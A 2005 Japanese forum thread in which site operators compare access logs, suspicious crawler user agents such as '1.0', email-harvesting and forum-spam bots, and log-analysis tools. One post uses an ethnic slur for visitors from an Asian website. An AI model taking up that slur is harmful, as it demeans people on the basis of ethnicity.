でも、ここで公開してるアドレスにはスパム全然こないんだよね。
アクセス元調べると国内外問わず大量。

こういうのって何のアクセスだかわかる人いらっしゃいませんか?
うち、アップローダーだから画像の更新調べて取って行くツールとかかなぁ?
それにしちゃ 某家電販売店.co.jp からとか、ありえなさそうだし。
結構いろんな所から頻繁に来るのでログもかなり膨らむし、いい加減なんとかしてやりたい。



435 :DNS未登録さん:05/01/08 09:39:45 ID:???
しばらく前からアクセス数が減っていたが、とうとう1.0が来なくなった。

436 :DNS未登録さん:05/01/09 02:22:37 ID:???
\x91\xfc\x82\xcc\x92\xca\x82\xe8\x82\xb7\x82\xaa\x82\xe8\x82\xc5\x82\xb7 \x8e\xb8\x97\xe7\x82\xb5\x82\xdc\x82\xb5\x82\xbd~
こんなUAあったんだが、何?

437 :DNS未登録さん:05/01/09 03:10:49 ID:???
>>435
ウチにはまだ来てるよ。確かに今年になって頻度は激減したけどね。

>>436
「只の通りすがりです失礼しました~」だな。

438 :DNS未登録さん:05/01/09 03:47:09 ID:???
>>437
クスコ

439 :DNS未登録さん:05/01/09 13:20:31 ID:???
「3」がうちにも来てた。
以前Openbotが来てたのと同じとこからだったよ。

440 :DNS未登録さん:05/01/09 13:43:54 ID:???
1.0、うちはほとんど減っていない。
http://www18.big.or.jp/~fujiwara/ikki/admin/ashiato/analyze.cgi?Index
も減っているようには見えない。減っているところが、うらやましい。

441 :DNS未登録さん:05/01/09 15:59:35 ID:???
>>440
ちなみに、その統計情報で 1.0 の次に頻出している
Netscape 4.78 [Win98] 220.99.102.*
ってのは、サーフモンキーアジアというところの
フィルタリング用ロボットだね。
うっとおしいからウチではハジくようにしている。

442 :DNS未登録さん:05/01/09 16:10:53 ID:???
>>439
ウチに来た「3」は、台湾の匿名プロキシからだった。
tp-s2-c233-19.router.hinet.net [211.72.233.19]

443 :DNS未登録さん:05/01/09 19:22:33 ID:???
1.0のアクセスって、深夜や早朝は少なくないか? 年末年始休み説はあんがい可能性が
あるかもしれないぞ。

444 :DNS未登録さん:05/01/11 00:00:15 ID:???
おとといの夜に作ったばかりのページに早くもzj008108.ppp.dion.ne.jpと61-27-196-137.rev.home.ne.jpから
1.0が到来。ウチは1.0は弾いてるので、このページのURLは別のツールで収集したのだろう。
確かにUAがMozilla/4.0 (compatible; MSIE 6.0; Windows 98)なんてのがdionとかocnとかから来てるんだよな。
このUAも弾くほうがいいのかなあ。
でも、home.ne.jpからは新しいページのリンク元に来たはずの、それらしいアクセスがみあたらない。どういうことだろ。

445 :バッカーです ◆KeuXjwWDdE :05/01/11 01:26:14 ID:???
どこかを拠点にして情報を共有しあってるってことだよね

446 :444:05/01/11 09:14:29 ID:???
このページは作りたてだし、奥まった目立たないところにあるから、まだあまりアクセスは
ない。それなのに、立て続けにbbtec.netとかtvnet.ne.jpからも1.0が来襲。結果的に
1.0トラップを作ったようなものだな。tvnet.ne.jpからの今年の一発目のアクセスが
この新しいページへのものだから、情報を共有しあっていることは確定だ。


447 :DNS未登録さん:05/01/16 03:04:28 ID:???
1.0は意外とスパイウェアかアドウェアみたいなモノなのかもだ。
そういうモノなら、情報を共有しあうこともあるんじゃないだろうか。

448 :DNS未登録さん:05/01/16 03:06:31 ID:???
1.0、年をまたいでまだ正体がわからないとは…
スパイウェアやアドウェアにしても、
日本のドメインからしかアクセスがないってのがなんか謎なんですよね
もしかして2chブラウザとかだったりして

449 :DNS未登録さん:05/01/16 12:36:29 ID:???
ウチに初めて1.0がやってきたのは1年以上前の2003年11月、
162.38.244.43.ap.yournet.ne.jp [43.244.38.162] からだった。
このホスト名をググってみると、net-staff.jp というスパマーのようだ。
かなり怪しい。

その後の1.0は以下の通り。
2003/11/25 162.38.244.43.ap.yournet.ne.jp [43.244.38.162]
2004/01/13 162.38.244.43.ap.yournet.ne.jp [43.244.38.162]
2004/02/03 162.38.244.43.ap.yournet.ne.jp [43.244.38.162]
2004/04/09 EATcf-520p203.ppp15.odn.ne.jp [218.46.193.203]
2004/04/23 ZG162189.ppp.dion.ne.jp [222.2.162.189]
2004/04/24 YahooBB220008128046.bbtec.net [220.8.128.46]
 この間はアクセスなし
2004/11/04 210-194-124-53.rev.home.ne.jp [210.194.124.53]
 これ以降、あちこちから頻繁にアクセスあり

やっぱりメールアドレス収集業者かな。

450 :449:05/01/16 14:37:23 ID:???
あ、ログをよく見たら、1.0 に加えて例のメール収集ロボット
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
で来ているホストが数個あった。
いずれも Yahoo*.bbtec.net だ。
やっぱり業者のツールなんじゃないの?

451 :DNS未登録さん:05/01/16 21:58:59 ID:???
http://www.birthday-p.co.jp/logs/access_log
は12月31日から1月11日あたりのログファイルらしいが、このなかで、1.0のアクセスは521回。発信元は189箇所。
発信元が散らばっていることを改めて確認できる。

barak.net.ilからはUserAgent/1.0っていうのが来ていて一瞬どきっとしたが、これはイスラエルのエージェント??


452 :DNS未登録さん:05/01/17 07:09:32 ID:???
>>450
YahooBBでまとめられてもなぁ。
全く同じIPアドレスじゃないとなぁ。


453 :450:05/01/17 23:15:36 ID:???
>>452
ごめんね、分かり難かった?
1.0 と "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" の
両方で同一ホストから来ている例がいくつかあった、って言いたかったんだけど。
だから業者なんじゃないの? って言いたかったんだけど。
で、それはいずれも Yahoo*.bbtec.net だったとも書いたけど、
これ自体は「業者である」という理由のつもりはなかったんだけど。
ホント、分かり難い文章書いちゃってごめんね、ボク。


454 :DNS未登録さん:05/01/18 02:43:47 ID:???
大人げない会話はやめようぜ('A`)

455 :DNS未登録さん:05/01/18 04:05:04 ID:???
>>450
YBB以外はどうなの

456 :DNS未登録さん:05/01/18 15:08:38 ID:???
>>450
それは前から指摘されてて実際臭いんだけど
罠はってもメアドが収集されないのはなぜだろう。
ディレクトリを登っていくというアクセスパターンをとるのはなぜだろう。
ていうとこから前に進まない。
>>384-392を参照


457 :DNS未登録さん:05/01/18 21:33:05 ID:1t1QWpXN
Soralisにおいてポート別にアクセスを行ったIPまでわかるログとその見方を
教えてください。
誰か知らないが、Oracleのストアドプロシジャを変更したIPを見つけたいのです。


458 :DNS未登録さん:05/01/18 23:12:49 ID:???
>>457
つ[Oracleのマニュアル]

ここで言っている「アクセスログ」とは、ほとんどweb serverの
ログの事だよ。

459 :DNS未登録さん:05/01/18 23:18:50 ID:???
>>457
Oracleのstored procedureってなんだか知らんが、プログラムを改変
されたって事?ひょっとしてOracleサーバへのアクセス制御やってない
とか?(絶句)

ログがあるかどうかはOracleの機能や設定によるだろうからなんとも
言えないけど、一般的な方法で事後に知る方法はない。何回もやられる
のなら、Ethereal等でパケットダンプを取ればある程度わかるが...まず
運用およびネットワーク構成を見直すほうが先だね。

460 :DNS未登録さん:05/01/18 23:26:20 ID:???
>>457
別の可能性としては、457はphpスクリプトでOracleを使っていたけど、
誰かに中身を書き換えられたって言いたいのかな?
入力を検査していなかったため、不正なSQL文が実行できるようになって
いたんじゃねぇの?

まったく457は、IP「アドレス」を忘れるし、質問に必要な最低限度の情報
も書かないし、困った香具師だ。

461 :DNS未登録さん:05/01/23 19:56:59 ID:???
それ以前の話として、「Soralis」って・・・

462 :DNS未登録さん:05/01/23 23:02:54 ID:???
>461
それは日本人にありがちな間違いだ。そっとしておけ。
おまいや俺だっていつやらかすかわからんし。

463 :DNS未登録さん:05/01/25 14:34:18 ID:???
ia_archiverってUAの詳細わかりませんか?
crawl30-public.alexa.comから来ているんだけど、
/aaa/bbb/ccc/0.gif
って感じに、実在するディレクトリの「0.gif」をひたすら叩きに来ている。
勿論0.gifなんて無いんだけど・・。
何をやりに来てるんだか判らない。
1日2〜30ディレクトリの0.gifを探している。

alexaってたしかスパイウェア作ってる、調査会社ですよね?
何やってるんだろう。

464 :DNS未登録さん:05/01/25 14:40:38 ID:???
Cerelonとかもありがちだしな。
http://ascii24.com/news/i/hard/article/1999/05/24/617069-000.html

465 :DNS未登録さん:05/01/25 15:51:49 ID:???
>>463
ぐぐれば一発だろ。WebArchiveだ。
http://c-moon.jp/robots.shtml

466 :463:05/01/26 16:28:13 ID:???
あ。そっか。
見たことあると思ったらWebArchiveのUAか。

でも明らかにWebArchiveとは動作が違うし、
リモートホストもalexaなので、完全に騙ってるようですね。

467 :DNS未登録さん:05/01/26 21:41:21 ID:???
>リモートホストもalexaなので、完全に騙ってるようですね。

ググれ
http://blog.fineart.jp/taku/archive/0001/01/01/476.aspx

468 :DNS未登録さん:05/01/27 01:00:36 ID:???
>>466
もうね、馬鹿かと、あほかと。


469 :DNS未登録さん:05/01/29 13:26:13 ID:VJnGm7z5
「1.0」は相変わらず来てる?
2回見かけただけで来なくなったけど。

470 :DNS未登録さん:05/01/29 14:18:19 ID:???
>>469
量は減ったかもしれないけど、相変わらず1.0来てるよ


471 :DNS未登録さん:05/01/29 21:28:36 ID:???
こっちも相変わらずだ。
http://www18.big.or.jp/~fujiwara/ikki/admin/ashiato/analyze.cgi?Index
http://www.birthday-p.co.jp/logs/access_log
もそんなに減っていない

472 :DNS未登録さん:05/01/30 06:21:21 ID:???
>>469
「1.0」は1月前半は全く来なかったのに1/15あたりから毎日来るようになった。
あと謎の「3」もよく来る。

473 :DNS未登録さん:05/01/30 13:31:16 ID:dhFJAVE6
謎の「3」・・・。
増殖してるのか?

474 :DNS未登録さん:05/01/30 14:06:31 ID:???
UserAgent「1.0」のメモ
http://blog.goo.ne.jp/a10s/e/1b619b5a56054a6122e1c8ee7181954c

475 :356:05/01/30 22:19:42 ID:???
メールが全然っ来ないのが非常に不気味・・・
とりあえず各1.0ごとに別のhtmlを食わせてみる。

476 :DNS未登録さん:05/02/02 18:12:56 ID:???
今朝、"Mozilla/4.0 (compatible; MSIE 6.0; Win32)"を名乗る
yahoobb218130150013.bbtec.netに絨毯爆撃を食らいました。
最初の数アクセスだけ
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
だったんだけど、その後上記のUAに変わり、
ディレクトリを登ったりリンクを辿ったりしてひどかったよ。
http://takayuki.oniichama.net/r/2004010602.php
↑ここでも報告されてるけど、みんなのところはどう?
"Mozilla/4.0 (compatible; MSIE 6.0; Win32)"って正常なUAだっけ?
拒否しても問題ないかな。

477 :476:05/02/02 18:21:46 ID:???
どう見ても機械的なアクセスなんだけど
しっかりReferer もあった。

478 :DNS未登録さん:05/02/02 18:30:52 ID:???
>>476
ダウンローダの詐称UAだと思ったけど、spamBotがそのUAを
名乗ってたこともあるので注意した方がいいかもしれない。
うちは絨毯爆撃は受けてないけどメアドの書いてあるページやCGIへの
アクセスは拒否してる。

479 :476:05/02/03 01:29:47 ID:???
>>478
http://koshipa.net/archives/000127.html
ここでも報告されてました。
やっぱ危ない連中ですね。夜にも来てたので拒否しました。。

480 :DNS未登録さん:05/02/03 23:18:10 ID:???
普通のMSIE 6.0;ならWindows*のはず・・・

481 :476:05/02/06 16:28:42 ID:???
>>480
そだね、たしかに。

"Microsoft URL Control - 6.01.9782"というのが来たんだけど
これはなんだろう。。

482 :DNS未登録さん:05/02/06 16:37:38 ID:???
>>481
Microsoftが提供するWWWアクセスライブラリのデフォルトUAだけど、
掲示板爆撃ツールがよくこのUAを名乗ってる。deny推奨。

483 :DNS未登録さん:05/02/06 16:47:36 ID:???
ググってみるとMicrosoft URL ControlのUAで書きこまれた
ゴミ広告が大量にヒットするね。
掲示板スパムツールだわ。

484 :DNS未登録さん:05/02/06 20:58:27 ID:???
英語わかんないのでおせーて
ttp://www.apnic.net/db/dbcopyright.html
↑ってなに

485 :DNS未登録さん:05/02/06 21:31:48 ID:C07zycbb
>>484
http://www.excite.co.jp/world/english/web/

486 :DNS未登録さん:05/02/06 22:34:43 ID:???
>>484
それくらいは読めるようになっておいたほうが身のためだぞ。
辞書引け。

487 :DNS未登録さん:05/02/06 23:46:45 ID:???
ここは2003年の7月から来ているらしい。>UA1.0
【UA1.0の謎】
ttp://antispam.blfan.org/ua10.htm

488 :DNS未登録さん:05/02/07 01:39:33 ID:???
バーチャルホストのログをLogFormatに%vと書いてまとめて同じファイルに出力しているんですが、
これを複数のバーチャルホストをまとめて解析できるツールってないですか?
analogやWebAlizerだと一個一個設定ファイル書かないといけないような感じなのですが。

489 :DNS未登録さん:05/02/07 09:07:04 ID:???
2002年の12月頃、依頼で、Win,UNIX系の両方で動く、メールごそっと取得スクリプト
作ったことがあるが、その時、UAは「1.0」だけにして業者に提供した。
なんか気になるなあって思っていたら、今日朝起きてふと思い出した。
wwwcpって無料のスクリプトを半分ぱくって作ったPerlで、コピーし放題で、
又売りされているのは知っていたが、まさかと思うが、俺のじゃないよなー 怖い、怖い。

490 :DNS未登録さん:05/02/07 17:39:58 ID:???
>>488
HTTP-ANALYZEができたような気が
http://www.http-analyze.org/

491 :488:05/02/07 21:29:12 ID:QiWAf9Uv
>>490
なるほど、それは日本語化とかされてますか?

492 :DNS未登録さん:05/02/07 22:12:24 ID:???
>>491
されてません

493 :DNS未登録さん:05/02/07 22:46:56 ID:???
210.136.232.249
バリューコマース株式会社



494 :DNS未登録さん:05/02/08 00:28:17 ID:???
>>489
どんなスクリプト? ファイル名は何にした?

495 :488:05/02/08 00:40:33 ID:OqtYGmqS
>>492
そうですか、わかりました、ありがとうございます。試してみてみます。
他に日本語化/日本語版で>>488のようなソフトがあれば宜しくお願いいたします。

496 :DNS未登録さん:05/02/12 17:53:32 ID:???
>>436
みたいな文字列の日本語へのデコード手順は?

Apacheログ解析ツールで、日本語変換もしてくれる物があれば…

497 :DNS未登録さん:05/02/12 21:10:14 ID:67KlQPt5
#!/usr/bin/perl

$string ="\x86\x68・・・・";
$string =~ s/\\x/%/;
$string =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $string;

498 :DNS未登録さん:05/02/12 22:33:01 ID:???
コード変換も必要だがや。

499 :DNS未登録さん:05/02/12 22:34:04 ID:???
>$string =~ s/\\x/%/;
>$string =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

なぜ
$string =~ s/\\x([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
じゃないんだろう・・・?

500 :497:05/02/13 01:25:17 ID:eHBsu7SQ
動きゃいい程度の技術が無いから決まってるじゃ無いかw

501 :497:05/02/13 01:26:16 ID:eHBsu7SQ
訂正
動きゃいい程度の技術しか無いから決まってるじゃ無いかw
鯖主であってプログラマーじゃ無いし。

502 :DNS未登録さん:05/02/13 19:17:33 ID:???
"Java/1.4.1_04" というUAについてご存知の方はいませんか?
Referer は吐かず、リンクを二階層まで辿ってる。
ときどき、azu.cgi という存在しないアクセスを試してる。
リモートホストは"cdma-3g1x-189-236.zappmobile.ro"

503 :DNS未登録さん:05/02/13 19:37:14 ID:???
ホスト名だけ見たら、海外の 3G CDMA 携帯に内蔵された Java ベースのブラウザと言ってみるテスト

504 :DNS未登録さん:05/02/14 02:29:43 ID:???
いや、PC上のJavaで作ったツールから
CDMA携帯電話経由でアクセスしてるんじゃないか?

505 :DNS未登録さん:05/02/15 09:00:51 ID:???
Java なんてブラウザあんのかな?

これも増えてるな↓
"DoCoMo/J-PHONE/KDDI/1.0 (CROOZ)"
http://blog.lunasys.net/item/20/catid/1

506 :DNS未登録さん:05/02/15 09:06:49 ID:???
http://crooz.jp/
これか。

507 :DNS未登録さん:05/02/15 16:35:41 ID:???
>Java なんてブラウザあんのかな?

Javaで書くとデフォルトのUAが "Java/JDKバージョン" になるんだよ。

508 :DNS未登録さん:05/02/15 19:20:57 ID:???
おお、なるほど
ということは "Java/" で拒否るのは可哀想かな

509 :DNS未登録さん:05/02/15 20:51:10 ID:???
いや、UA=Java/* は殆ど全てが自動アクセスツールで、
(ブラウザのように)人間が目で見ている確率は
非常に低いから、全部拒否でもかまわないと思うぞ。

510 :まぁさぁ:05/02/17 00:30:15 ID:???
おねがいでつ★
誰か私のHPの荒してる人の情報を
調べてください・・・
ひどくて・・・
ログ表示設定にしてるんで・・・
してくれる方メルよろしくです・・・

511 :DNS未登録さん:05/02/17 00:44:57 ID:???
まずアドレスここに書くと良いよ。

512 :DNS未登録さん:05/02/17 11:01:28 ID:???
どうせフィッシングだろ。相手にすんな。

513 :DNS未登録さん:05/02/17 16:03:44 ID:???
>>512
「フィッシング」の意味を勘違いしてると思う。ひょっとして「釣り」だとでも?

514 :DNS未登録さん:05/02/17 16:20:15 ID:???
>513
そうか、むやみやたらにそれらしい電子メールを送りつけて、
返事が来た香具師をカタにはめるだけではフィッシングとは
言わないか。銀行等のweb pageに化ける奴と最初は似ている
から、混同してたよ。

515 :DNS未登録さん:05/02/17 20:12:11 ID:??? ?
>>513
雑魚釣り。

516 :DNS未登録さん:05/02/17 20:26:57 ID:???
メール発射しますた。

517 :DNS未登録さん:05/02/17 20:35:30 ID:???
漏れもメール今朝発射して出勤したのだが、返事がない。

518 :まぁさぁ:05/02/17 22:00:34 ID:???
釣りとか絶対ありぇませんよ。。。
本当に悩んでるんです・・・

519 :516:05/02/19 19:56:32 ID:???
自信を満足にするパートナーの貴方?????

520 :DNS未登録さん:05/02/19 20:36:06 ID:???
>>519
やっぱりメアド収集が目的だった、ってこと?

521 :DNS未登録さん:05/02/27 20:21:56 ID:???
今朝からGoogleのロボットのUAが変わったっぽい。

Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

crawl-66-249-65-83.googlebot.com からだからニセモノではないようだ。

522 :DNS未登録さん:05/02/27 20:41:03 ID:???
別に今朝からではないです。

523 :DNS未登録さん:05/02/27 22:02:25 ID:???
>>522
ぐはぁ、いま確認したら、確かにずっと前から来てた。欝。

524 :DNS未登録さん:05/03/03 13:13:34 ID:???
最近wiki設置したからクエリーごとログを取りたくてawstats.confで
URLWithQuery=1
としたのですがこれでクエリー以降の文字列も解析できるのですよね?
(この設定だけじゃクエリーのデコードはできないだろうけど)

デコードするプラグイン等はないのでしょうか?

525 :DNS未登録さん:05/03/04 01:09:59 ID:???
あぁ、検索エンジンからのクエリーを日本語化したらアクセスされたurlも日本語になりました。
検索クエリーはどうでも良かったのでスルーしてました、access_log丸ごと変換するんですね。

526 :DNS未登録さん:05/03/11 01:28:06 ID:???
1.0 来なくなった。

527 :DNS未登録さん:05/03/11 02:11:21 ID:???
> 1.0 来なくなった。
うちへは相変わらず。
p5024-adsah04motoma-acca.hiroshima.ocn.ne.jp - - [09/Mar/2005:17:57:45 +0900] "GET /foo/ HTTP/1.0" 403 13 "-" "1.0"
p5024-adsah04motoma-acca.hiroshima.ocn.ne.jp - - [09/Mar/2005:17:57:45 +0900] "GET /foo/bar/ HTTP/1.0" 200 15916 "-" "1.0"
p5024-adsah04motoma-acca.hiroshima.ocn.ne.jp - - [09/Mar/2005:17:57:45 +0900] "GET / HTTP/1.0" 200 2981 "-" "1.0"
しかし囮アドレスへのspam送信は、いまだ確認できず。

528 :DNS未登録さん:05/03/12 11:47:07 ID:???
>>502に似たUAの変態アクセスがあったよ〜
237fw42.nec.com - - [11/Mar/2005:06:25:53 +0900] "GET /robots.txt HTTP/1.1" 200 24 "-" "Java/1.4.2_03"
237fw42.nec.com - - [11/Mar/2005:06:25:54 +0900] "GET /hoge.html HTTP/1.1" 200 9503 "-" "Ken"
237fw42.nec.com - - [11/Mar/2005:06:25:57 +0900] "GET /foo.rdf HTTP/1.1" 200 31339 "-" "Ken"
237fw42.nec.com - - [11/Mar/2005:06:25:59 +0900] "GET /var.html HTTP/1.1" 200 9193 "-" "Ken"
237fw42.nec.com - - [11/Mar/2005:06:35:35 +0900] "GET /hogehoge.html HTTP/1.1" 200 10092 "-" "Ken"


529 :526:05/03/13 11:09:26 ID:???
2月8日が最後だった。
うちだけだったのか。

530 :DNS未登録さん:05/03/13 17:21:57 ID:???
1.0 来なくなったと思ったら、月に1、2回くらいの間隔でたまにやって来る。

531 :DNS未登録さん:05/03/13 23:51:54 ID:???
うちはもっと頻繁にくるな。
まぁ全部撃退してるわけだが。

532 :DNS未登録さん:05/03/15 23:49:52 ID:buDmIdlG
流れと違くてすいません。

webalizerを使ってapacheのアクセス解析をしています。
apacheのログファイルaccess_logが一定量になるとaccess_log.1.gzになります。
そうするとweblizerは新しくなったaccess_logを参照して以前のデータは表示されなくなってしまいます。

この問題を回避するにはどうしたらいいでしょうか
やはりaccess_logを圧縮させないでずっと同じファイルでログをとるしかないのでしょうか

よろしくおねがします

533 :DNS未登録さん:05/03/16 00:57:37 ID:???
>532
問題じゃなくて、そういう仕様なんだって。
でかいテキストファイルを扱うのは酷だろうに。

534 :DNS未登録さん:05/03/16 13:17:17 ID:???
>>532
1. access_log だけ食わせてれば前回までの集計結果以降の分だけが
集計結果に追加される。
2. 例えば (zcat access_log.1.gz ; cat access_log)|webalizer とか。
過去のをどれだけ食わせるかは自分の要求やマシンスペックと相談してくれ。

俺の場合 1. を cron で数時間おきに、2. を明け方に 1回実行してる。
webalizer.conf いじると 1. だけじゃ既に集計済みの方に変更点が反映されないので。

535 :DNS未登録さん:05/03/16 20:53:30 ID:???
>>533-534
解答ありがとうございます。
webalizer側での対応で解決しそうですね

536 :DNS未登録さん:05/03/16 23:27:31 ID:ClAe6VvM
iplog使っているんだけど、グラフ化できないかな?
snortをbaseとpostgres使ってグラフ化しようと思ったんだけど、うまくいかないし、
net-snmpをrrdtoolとhotsanicグラフ化しようとしても画像が出ないし、
mrtgはインストールできないしでダルすぎ。
唯一できているのがwebalizerなので、何とかしたい。

pf+iplog+snort+net-snmp+clamavでウマァな予感がしていたのだが、
グラフ化できなきゃ意味無いじゃんw

537 :DNS未登録さん:05/03/16 23:29:39 ID:???
一番ダルいのはお前自身。

538 :DNS未登録さん:05/03/16 23:32:54 ID:???
よく見ろ、奴はCIAの回し者だw

539 :DNS未登録さん:05/03/17 22:31:00 ID:???
>>532
これって Webalizer の Incremantal が Yes になってないだけじゃない?

540 :DNS未登録さん:05/03/19 07:46:15 ID:vG8VZY9C
net-snmpでmakeするときに
tcpTable_next_entry
tcpTable_free
tcpTable_load

inp_queue
でエラってる模様なんだけど、解決策ないかな?

541 :527:05/03/21 01:03:24 ID:???
日曜日は3件ほど来ていた。 >UA1.0
03/20 10:55 210.149.120.126 (ca6-nat.cty-net.ne.jp) 1.0 (三重?)
03/20 16:40 220.45.0.2 (YahooBB220045000002.bbtec.net) 1.0 (香川)
03/20 21:21 61.44.4.177 (177.4.44.61.ap.yournet.ne.jp) 1.0 (兵庫)
やっぱり日本のISPから、地域はバラバラで来ているな。

542 :DNS未登録さん:2005/03/24(木) 11:45:30 ID:ch02x4rG
ttp://61.197.184.133/-/nonCERNproxy
この串って何ですか?


543 :DNS未登録さん:2005/03/31(木) 21:14:57 ID:???
1.0、2月あたりからひどかったときの10分の1くらいに減ってる。まだ来てはいるが、
それほど気にならない程度になってくれた。それにしても、何だったんだ。

544 :527:2005/04/03(日) 13:38:48 ID:???
3月は、104アクセス中38回が1.0のアクセスだった。
(トップページだがリンクは貼られていない、ただし検索ロボットはやってくる場所)
1日1回強だから、落ち着いてきてはいるかな。

545 :DNS未登録さん:2005/04/03(日) 22:48:39 ID:??? ?
104アクセス中自分のアクセスは66?

546 :527:2005/04/04(月) 02:18:26 ID:???
> 104アクセス中自分のアクセスは66?
うんにゃ、自分じゃそのページにはアクセスしていない。
公開している下位のページから、検索ロボットが勝手に辿ってきたり、
訪問者がディレクトリを削って直接アクセスしてきたり。
> 03/02 09:31 68.142.249.179 (lj2169.inktomisearch.com)
> Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
> 03/02 18:55 207.46.98.44 (msnbot.msn.com)
> msnbot/1.0 (+http://search.msn.com/msnbot.htm)

547 :DNS未登録さん:2005/04/25(月) 07:43:30 ID:???
生ログ見てると、行儀の悪いロボット君がいたからBangしてやった。
HTTP_HOST: sv-crawl.looksmart.com
HTTP_USER_AGENT: Mozilla/4.0 compatible ZyBorg/1.0 (wn-13.zyborg@looksmart.net; http://www.WISEnutbot.com)

robots.txtもろくに読まず、410のステータスを返しても何度もやってくる。しつこい。

548 :DNS未登録さん:2005/04/30(土) 23:11:44 ID:???
Bang?

549 :DNS未登録さん:2005/05/04(水) 21:22:49 ID:???
ban と言いたかったけど無知だった、ってことじゃないの?

550 :DNS未登録さん:2005/05/05(木) 00:09:29 ID:???
BorgとBangを掛けるとは、なかなかヤルなw

551 :DNS未登録さん:2005/05/06(金) 17:08:52 ID:???
;y=-( ゚д゚)・∵;; ターン

552 :DNS未登録さん:2005/05/17(火) 21:31:16 ID:i0hrzpYv ?
昨日の18時頃と今日の16時頃に、203080097xxx.ctinets.com(xxxは任意の3桁)
からものっそい集中アクセス受けてる。ログ記録の間隔から言って、どう考えて
も「ページを見ている」って感じじゃなさそう。
ttp://www.ctinets.com/ に行ってみるとチョン系のWebサイトみたいなんだが、
チョンがウチのHPに何の用なんだ一体。ってか過負荷かけんなよ!!

553 :DNS未登録さん:2005/05/17(火) 22:26:42 ID:???
>>552
掲示板の自動書き込みロボットという説がある
http://wiki.chongqed.org/WikiForum (050501b参照)

ところで、最近は香港の中華系住民のことを「チョン」と呼ぶようになったのか?

554 :552:2005/05/18(水) 23:54:01 ID:???
>>553
dクス。ロボットかぁ…掲示板は無傷なんだけど、ctinets.comの連続アクセス
以降、2時間に渡って訪問者ゼロ。どうやら鯖が落ちたらしいorz
掲示板は弾けるけど、無料HPスペースだから普通のWebページにアクセス規制
かけると規約違反になるので辛いッス。
そのうち飽きて来なくなる事を祈りたいです。

香港のサイトだったですか…。てっきり中とか北とか思ってマスタ。

555 :DNS未登録さん:2005/05/26(木) 23:50:45 ID:7EL4hH4q
携帯のサブスクライバIDとか固体識別番号とかも見れるアクセス解析ってありますか?

556 :DNS未登録さん:2005/05/28(土) 14:48:40 ID:???
>>555
君は何か勘違いしてる

557 :DNS未登録さん:2005/05/28(土) 22:05:33 ID:???
>>555
固体識別番号は送信させればUAに入ってくるんじゃないか?

558 :DNS未登録さん:2005/05/28(土) 22:44:03 ID:???
>>557
それはVodaphoneのみ。AUは独自のHTTPヘッダで送ってくる。
DoCoMoは(公式サイト以外には)一切送ってこない。

559 :DNS未登録さん:2005/05/29(日) 01:32:26 ID:???
>>558
>DoCoMoは(公式サイト以外には)一切送ってこない。
それだと、2chに書き込めませんね

560 :DNS未登録さん:2005/05/29(日) 01:49:37 ID:???
DoCoMoの公式サイトに送ってくるやつは機体識別ではなく
電話番号(個人)の識別になっている。
機種買い換えても電話番号持ってくると同じ識別コードになる

561 :DNS未登録さん:2005/05/29(日) 07:46:21 ID:???
DoCoMo でも、リンクのタグを <a href="URL" utn> とすると
UA に個体識別番号が入ってくる(ただしダイアログが出る)。
詳細は↓参照。
http://www.nttdocomo.co.jp/p_s/imode/tag/utn.html

>>560
上のページを見ればわかるが、端末の個体識別情報と
SIMカードの個体識別情報の両方が入るよ。

562 :DNS未登録さん:2005/05/30(月) 21:13:02 ID:???
いやだから、utnと公式サイトのはまったく別の物だって言ってるの

563 :DNS未登録さん:2005/05/31(火) 15:53:13 ID:???
公式サイトの話なんて元々してなかったのにし始めた馬鹿がいる、それだけ。

564 :DNS未登録さん:2005/06/08(水) 00:55:07 ID:???
またUAが 1.0 のやつ増えてきているんですが、うちだけですかねえ?

565 :DNS未登録さん:2005/06/09(木) 18:47:00 ID:???
コンスタントにうちんとこには来てるねぇ

566 :DNS未登録さん:2005/06/16(木) 07:04:13 ID:???
aipbot/1.0 (aipbot; http://www.aipbot.com; aipbot@aipbot.com)
最近来る。サイトに行っても何の目的かわかんね。


関係ないがGooglebot、YSTは圧縮転送deflate対応で帯域にやさしいが、
msnbot、Infoseek SideWinder/2.0Bは圧縮転送に対応してないのかごっそり帯域使ってくれるのがむかつく。

ZyBorg/1.0 Dead Link CheckerはGETで来るが、デッドリンクのチェックならHEADで事足りないのか?と思う。


567 :DNS未登録さん:2005/06/29(水) 15:05:02 ID:???
うちのUA 1.0なんだが、
・IPでトップディレクトにのみアクセスしてくる。
・自分のISPと同じホストからのみ
・内1つのホストからは10〜30分間隔でランダムで、1ヶ月ホスト変わらず。そのほかからは1日に4,5回程度で、ホストは固定ではない。
・頻繁にアクセスしてくるホストはIISでwebサーバ立ってる。(トップページはタイトルが「作成中」でIISのデフォルトページ?)

(;´Д`)なんか特殊?

568 :DNS未登録さん:2005/06/29(水) 15:33:36 ID:???
>>567
IISでサーバが経ってるってのは珍しいかも

569 :DNS未登録さん:2005/06/29(水) 15:34:00 ID:???
gala.jpからのクローラーうぜーーーーーーーーーーーー

570 :DNS未登録さん:2005/06/29(水) 16:24:50 ID:???
>>569
それ、自社のフィルタリングソフトのためのデータ収集ロボットだね。
普通のクローラーのようにリンクを辿っていくだけじゃなくて、
何かの検索エンジンでキーワード(例えばエッチな単語)を検索して
その結果から辿ってきているようにも見える。
(もちろんrefererは完全に隠蔽されているんだが)
確かに、特定の傾向を持つページ(つまりフィルタリングすべきページ)を
収集するのなら、手当たり次第にクロールするよりも効率がいい。

571 :DNS未登録さん:2005/06/30(木) 03:50:16 ID:???
>>570
一度に3つのホストから大量に掲示板CGIにアクセスしてくるから辛い。

572 :DNS未登録さん:2005/07/01(金) 23:22:32 ID:???
IPアドレス 61.114.83.*
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
非公開鯖なのに数日に渡る連続アクセスうざすぎ
それも何者だよコイツ

573 :DNS未登録さん:2005/07/02(土) 01:00:53 ID:???
galaからのアクセスを遮断したら同じようなUAで同じような挙動のアクセスを繰り返すやつが訪れた件について

別のやつなのかなぁ

